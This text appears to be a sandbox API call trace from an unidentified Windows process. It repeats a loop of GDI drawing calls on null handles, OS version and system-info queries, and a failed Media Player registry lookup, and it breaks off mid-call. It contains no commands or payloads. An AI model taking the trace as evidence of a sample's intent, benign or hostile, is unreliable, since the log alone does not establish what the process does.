[0087.580] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x60407d3 [0087.580] CombineRgn (hrgnDst=0x2a0407c8, hrgnSrc1=0x50401d0, hrgnSrc2=0x70401cd, iMode=1) returned 1 [0087.580] CombineRgn (hrgnDst=0x60407d3, hrgnSrc1=0x50401d0, hrgnSrc2=0x70401cd, iMode=4) returned 2 [0087.580] CreateSolidBrush (color=0xff) returned 0x4100267 [0087.580] CreateSolidBrush (color=0xff0000) returned 0x61007d1 [0087.580] DeleteObject (ho=0x61007d1) returned 1 [0087.580] DeleteObject (ho=0x70401cd) returned 1 [0087.580] DeleteObject (ho=0x50401d0) returned 1 [0087.580] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.580] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.580] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.580] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.580] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.580] BeginPath (hdc=0x0) returned 0 [0087.580] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.580] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.581] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.581] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.581] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.581] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.581] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.581] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.581] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x80401cd [0087.581] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x60401d0 [0087.581] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3e0407eb [0087.581] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x440407ef [0087.581] CombineRgn (hrgnDst=0x3e0407eb, hrgnSrc1=0x80401cd, hrgnSrc2=0x60401d0, iMode=1) returned 1 [0087.581] CombineRgn (hrgnDst=0x440407ef, hrgnSrc1=0x80401cd, hrgnSrc2=0x60401d0, iMode=4) returned 2 [0087.581] CreateSolidBrush (color=0xff) returned 0x71007d1 [0087.581] CreateSolidBrush (color=0xff0000) returned 0x381007f6 [0087.581] DeleteObject (ho=0x381007f6) returned 1 [0087.581] DeleteObject (ho=0x60401d0) returned 1 [0087.581] DeleteObject (ho=0x80401cd) returned 1 [0087.581] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.581] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.581] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.581] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.581] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.581] BeginPath (hdc=0x0) returned 0 [0087.581] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.581] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.581] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.581] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.581] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.581] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.582] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.582] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.582] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x70401d0 [0087.582] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x90401cd [0087.582] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x30407f8 [0087.582] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10407f9 [0087.582] CombineRgn (hrgnDst=0x30407f8, hrgnSrc1=0x70401d0, hrgnSrc2=0x90401cd, iMode=1) returned 1 [0087.582] CombineRgn (hrgnDst=0x10407f9, hrgnSrc1=0x70401d0, hrgnSrc2=0x90401cd, iMode=4) returned 2 [0087.582] CreateSolidBrush (color=0xff) returned 0x391007f6 [0087.582] CreateSolidBrush (color=0xff0000) returned 0x11007fa [0087.582] DeleteObject (ho=0x11007fa) returned 1 [0087.582] DeleteObject (ho=0x90401cd) returned 1 [0087.582] DeleteObject (ho=0x70401d0) returned 1 [0087.582] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.582] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.582] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.582] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.582] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.582] BeginPath (hdc=0x0) returned 0 [0087.582] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.582] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.582] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.582] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.582] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.582] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.582] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.583] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.583] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa0401cd [0087.583] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x80401d0 [0087.583] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10407fb [0087.583] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10407fc [0087.583] CombineRgn (hrgnDst=0x10407fb, hrgnSrc1=0xa0401cd, hrgnSrc2=0x80401d0, iMode=1) returned 1 [0087.583] CombineRgn (hrgnDst=0x10407fc, hrgnSrc1=0xa0401cd, hrgnSrc2=0x80401d0, iMode=4) returned 2 [0087.583] CreateSolidBrush (color=0xff) returned 0x21007fa [0087.583] CreateSolidBrush (color=0xff0000) returned 0x11007fd [0087.583] DeleteObject (ho=0x11007fd) returned 1 [0087.583] DeleteObject (ho=0x80401d0) returned 1 [0087.583] DeleteObject (ho=0xa0401cd) returned 1 [0087.583] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.583] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.583] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.583] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.583] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.583] BeginPath (hdc=0x0) returned 0 [0087.583] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.583] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.583] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.583] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.583] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.583] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.583] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.583] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.584] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x90401d0 [0087.584] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb0401cd [0087.584] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10407fe [0087.584] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10407ff [0087.584] CombineRgn (hrgnDst=0x10407fe, hrgnSrc1=0x90401d0, hrgnSrc2=0xb0401cd, iMode=1) returned 1 [0087.584] CombineRgn (hrgnDst=0x10407ff, hrgnSrc1=0x90401d0, hrgnSrc2=0xb0401cd, iMode=4) returned 2 [0087.584] CreateSolidBrush (color=0xff) returned 0x21007fd [0087.584] CreateSolidBrush (color=0xff0000) returned 0x1100800 [0087.584] DeleteObject (ho=0x1100800) returned 1 [0087.584] DeleteObject (ho=0xb0401cd) returned 1 [0087.584] DeleteObject (ho=0x90401d0) returned 1 [0087.584] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.584] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.584] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.584] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.584] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.584] BeginPath (hdc=0x0) returned 0 [0087.584] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.584] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.584] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.584] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.584] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.584] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.584] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.584] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.585] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc0401cd [0087.585] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa0401d0 [0087.585] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040801 [0087.585] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040802 [0087.585] CombineRgn (hrgnDst=0x1040801, hrgnSrc1=0xc0401cd, hrgnSrc2=0xa0401d0, iMode=1) returned 1 [0087.585] CombineRgn (hrgnDst=0x1040802, hrgnSrc1=0xc0401cd, hrgnSrc2=0xa0401d0, iMode=4) returned 2 [0087.585] CreateSolidBrush (color=0xff) returned 0x2100800 [0087.585] CreateSolidBrush (color=0xff0000) returned 0x1100803 [0087.585] DeleteObject (ho=0x1100803) returned 1 [0087.585] DeleteObject (ho=0xa0401d0) returned 1 [0087.585] DeleteObject (ho=0xc0401cd) returned 1 [0087.585] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.585] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.585] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.585] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.585] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.585] BeginPath (hdc=0x0) returned 0 [0087.585] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.585] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.585] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.585] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.585] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.585] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.585] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.585] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.586] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb0401d0 [0087.586] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd0401cd [0087.586] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040804 [0087.586] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040805 [0087.586] CombineRgn (hrgnDst=0x1040804, hrgnSrc1=0xb0401d0, hrgnSrc2=0xd0401cd, iMode=1) returned 1 [0087.586] CombineRgn (hrgnDst=0x1040805, hrgnSrc1=0xb0401d0, hrgnSrc2=0xd0401cd, iMode=4) returned 2 [0087.586] CreateSolidBrush (color=0xff) returned 0x2100803 [0087.586] CreateSolidBrush (color=0xff0000) returned 0x1100806 [0087.586] DeleteObject (ho=0x1100806) returned 1 [0087.586] DeleteObject (ho=0xd0401cd) returned 1 [0087.586] DeleteObject (ho=0xb0401d0) returned 1 [0087.586] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.586] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.586] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.586] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.586] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.586] BeginPath (hdc=0x0) returned 0 [0087.586] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.586] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.586] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.586] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.586] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.586] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.586] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.586] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.586] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe0401cd [0087.586] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc0401d0 [0087.586] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040807 [0087.587] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040808 [0087.587] CombineRgn (hrgnDst=0x1040807, hrgnSrc1=0xe0401cd, hrgnSrc2=0xc0401d0, iMode=1) returned 1 [0087.587] CombineRgn (hrgnDst=0x1040808, hrgnSrc1=0xe0401cd, hrgnSrc2=0xc0401d0, iMode=4) returned 2 [0087.587] CreateSolidBrush (color=0xff) returned 0x2100806 [0087.587] CreateSolidBrush (color=0xff0000) returned 0x1100809 [0087.587] DeleteObject (ho=0x1100809) returned 1 [0087.587] DeleteObject (ho=0xc0401d0) returned 1 [0087.587] DeleteObject (ho=0xe0401cd) returned 1 [0087.587] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.587] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.587] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.587] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.587] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.587] BeginPath (hdc=0x0) returned 0 [0087.587] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.587] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.587] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.587] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.587] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.587] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.587] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.587] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.587] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd0401d0 [0087.587] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf0401cd [0087.587] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104080a [0087.587] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104080b [0087.588] CombineRgn (hrgnDst=0x104080a, hrgnSrc1=0xd0401d0, hrgnSrc2=0xf0401cd, iMode=1) returned 1 [0087.588] CombineRgn (hrgnDst=0x104080b, hrgnSrc1=0xd0401d0, hrgnSrc2=0xf0401cd, iMode=4) returned 2 [0087.588] CreateSolidBrush (color=0xff) returned 0x2100809 [0087.588] CreateSolidBrush (color=0xff0000) returned 0x110080c [0087.588] DeleteObject (ho=0x110080c) returned 1 [0087.588] DeleteObject (ho=0xf0401cd) returned 1 [0087.588] DeleteObject (ho=0xd0401d0) returned 1 [0087.588] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.588] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.588] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.588] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.588] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.588] BeginPath (hdc=0x0) returned 0 [0087.588] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.588] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.588] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.588] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.588] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.588] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.588] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.588] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.588] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x100401cd [0087.588] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe0401d0 [0087.588] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104080d [0087.588] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104080e [0087.588] CombineRgn (hrgnDst=0x104080d, hrgnSrc1=0x100401cd, hrgnSrc2=0xe0401d0, iMode=1) returned 1 [0087.588] CombineRgn (hrgnDst=0x104080e, hrgnSrc1=0x100401cd, hrgnSrc2=0xe0401d0, iMode=4) returned 2 [0087.588] CreateSolidBrush (color=0xff) returned 0x210080c [0087.588] CreateSolidBrush (color=0xff0000) returned 0x110080f [0087.589] DeleteObject (ho=0x110080f) returned 1 [0087.589] DeleteObject (ho=0xe0401d0) returned 1 [0087.589] DeleteObject (ho=0x100401cd) returned 1 [0087.589] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.589] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, 